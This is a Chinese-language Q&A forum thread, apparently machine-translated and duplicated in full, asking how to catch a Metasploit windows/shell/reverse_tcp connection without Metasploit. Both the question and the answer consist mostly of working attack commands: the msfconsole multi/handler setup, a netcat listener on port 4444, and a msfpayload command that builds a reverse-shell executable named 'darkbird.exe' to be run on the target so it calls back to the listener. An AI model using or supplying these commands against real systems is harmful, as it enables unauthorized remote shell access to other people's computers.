独立 multi/handler reverse_tcp
Standalone multi/handler reverse_tcp
对不起我的英语。
我使用 metasploit 为 windows 7 生成了一个带有 windows/shell/reverse_tcp 负载的漏洞。
然后我使用 msfconsole 等待连接:
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit
我已成功连接到 windows 的命令行。
但是我需要在不使用 metasploit 的情况下进行连接。我找到了如何创建独立模块,但这只是为了利用。
我需要独立的 multi/handler reverse_tcp 或者只是监听某个端口然后访问命令行的代码。
我真的不知道你的 constraints/restrictions 是什么。
我的猜测是,您想 "receive shells" 在没有安装 metasploit 的计算机上。
如果是这种情况,您可以使用 msfd(metasploit daemon 安装在另一台计算机上)或者只是 netcat、socat、...
你怎么看这个:
- 在 192.168.1.2 上用 netcat 监听
# nc -l -p 4444
- 改用 shell_reverse_tcp
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
- 在目标
上执行darkbird.exe
对不起我的英语。 我使用 metasploit 为 windows 7 生成了一个带有 windows/shell/reverse_tcp 负载的漏洞。 然后我使用 msfconsole 等待连接:
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit
我已成功连接到 windows 的命令行。 但是我需要在不使用 metasploit 的情况下进行连接。我找到了如何创建独立模块,但这只是为了利用。 我需要独立的 multi/handler reverse_tcp 或者只是监听某个端口然后访问命令行的代码。
我真的不知道你的 constraints/restrictions 是什么。
我的猜测是,您想 "receive shells" 在没有安装 metasploit 的计算机上。
如果是这种情况,您可以使用 msfd(metasploit daemon 安装在另一台计算机上)或者只是 netcat、socat、...
你怎么看这个:
- 在 192.168.1.2 上用 netcat 监听
# nc -l -p 4444
- 改用 shell_reverse_tcp
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
- 在目标 上执行darkbird.exe